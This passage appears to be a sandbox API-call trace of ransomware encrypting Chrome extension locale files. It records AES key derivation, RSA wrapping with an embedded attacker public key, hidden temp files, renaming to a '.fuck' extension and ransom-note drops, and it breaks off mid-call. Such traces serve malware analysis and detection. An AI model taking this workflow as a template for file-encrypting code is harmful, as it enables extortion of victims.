returned 1 [0260.710] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.711] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.712] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.712] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.714] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.714] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.714] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.714] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.714] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.714] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.714] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70518) returned 1 [0260.715] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70518, dwCertEncodingType=0x1, pInfo=0x2eac720*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac750*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac758*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d8c0) returned 1 [0260.715] CryptEncrypt (in: hKey=0x2e7d8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.715] CryptEncrypt (in: hKey=0x2e7d8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e706b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e706b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.715] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e706b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e706b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.716] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x144, lpOverlapped=0x0) returned 1 [0260.717] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x144, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0260.717] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0260.717] CloseHandle (hObject=0x5d64) returned 1 [0260.717] CloseHandle (hObject=0x5d5c) returned 1 [0260.717] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0260.720] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0260.720] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.gsg")) returned 1 [0260.721] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.fuck")) returned 1 [0260.722] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.722] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.722] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.723] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.723] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.723] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0260.723] AreFileApisANSI () returned 1 [0260.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.723] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.723] GetFileType (hFile=0x5d60) returned 0x1 [0260.724] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.724] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.725] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.725] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.725] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.725] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.725] GetLastError () returned 0x0 [0260.725] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json")) returned 0x20 [0260.725] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0260.726] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.727] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.728] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.728] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.730] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.730] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.730] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.730] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.730] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.730] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.730] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e705a0) returned 1 [0260.730] CryptImportPublicKeyInfo (in: hCryptProv=0x2e705a0, dwCertEncodingType=0x1, pInfo=0x2eabe30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabe60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabe68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d100) returned 1 [0260.730] CryptEncrypt (in: hKey=0x2e7d100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.731] CryptEncrypt (in: hKey=0x2e7d100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70738*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70738*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.731] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70738*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70738*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.731] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xea, lpOverlapped=0x0) returned 1 [0260.732] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xea, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.732] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.733] CloseHandle (hObject=0x5d5c) returned 1 [0260.733] CloseHandle (hObject=0x5d64) returned 1 [0260.733] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0260.737] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0260.737] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0260.738] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0260.739] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.739] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.739] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.739] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.739] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.739] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0260.740] AreFileApisANSI () returned 1 [0260.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.740] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.740] GetFileType (hFile=0x5d60) returned 0x1 [0260.741] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.742] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.742] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.743] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.743] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.743] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.743] GetLastError () returned 0x0 [0260.743] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json")) returned 0x20 [0260.743] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0260.743] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.744] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.745] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.745] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.748] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.748] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0260.748] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.748] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.748] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.748] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.748] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70a68) returned 1 [0260.749] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70a68, dwCertEncodingType=0x1, pInfo=0x2eab950*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eab980*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eab988*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d380) returned 1 [0260.749] CryptEncrypt (in: hKey=0x2e7d380, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.749] 